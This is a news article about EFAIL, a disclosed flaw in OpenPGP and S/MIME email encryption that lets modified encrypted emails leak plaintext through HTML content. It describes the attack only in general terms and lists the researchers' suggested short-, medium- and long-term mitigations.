A threatening flaw in email encryption was revealed Monday in a report from European researchers. If some sources are to be believed, it could spell the end of email as a secure channel.
The new vulnerability is called EFAIL. It exposes the plaintext of encrypted emails for users of OpenPGP (Pretty Good Privacy) and S/MIME (Secure/Multipurpose Internet Mail Extensions, the two most
prominent standards for end-to-end encryption of email, according to the report from the Electronic Frontier Foundation (EFF).
The findings are based on models, so it is unclear whether harm
has actually occurred. But the authors state that they have “disclosed the vulnerabilities to all affected email vendors, and to national CERTs and our findings were confirmed by these
bodies.”
They continue that in their model, the attacker is able to collect end-to-end encrypted emails, either through a man-in-the-middle attack on the network, by accessing a SMTP
server, by accessing the IMAP account on the server, or by some other means. "He may store these emails for some time before he starts his attack.”
advertisement
advertisement
This is possible because of a basic
flaw of end-to-end encryption, they add.
“While transport security between mail servers is useful against some attacker scenarios, it does not offer reliable security
guarantees regarding confidentiality and authenticity of emails,” the researchers state.
It is, for example, not enough to deter attacks by “nation state actors, large-scale
breaches of email servers, revealing millions of email messages, or attackers compromising email accounts,” they explain.
In this scenario, attackers send a “changed
encrypted email” to the victim. And that person’s email client decrypts the email and loads external content, “thus exfiltrating the plaintext to the attacker.”
The
researchers used CBC/CFB gadgets “to enject malicious plaintext snippets into encrypted emails that abuse existing and standard conforming backchannels, for example, in in HTML, CSS, or x509
functionality, to exfiltrate the full plaintext after decryption.”
They add that EFAIL “abuses active content of HTML emails, for example externally loaded images or styles, to
exfiltrate plaintext through requested URLs.”
One of the researchers, Sebastian Schinzel, told Süddeutsche Zeitung that “email is no longer a secure communication
medium,” according to Gizmodo. It remains to be seen if this is overhype.
Meanwhile, the report suggests several strategies for preventing EFAIL attacks:
Short
Term
No decryption in email client
Disable HTML rendering
Medium Term
Patching
Long Term
Update OpenPGP and S/MIME standards
The report was authored by Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky and Jörg Schwenk.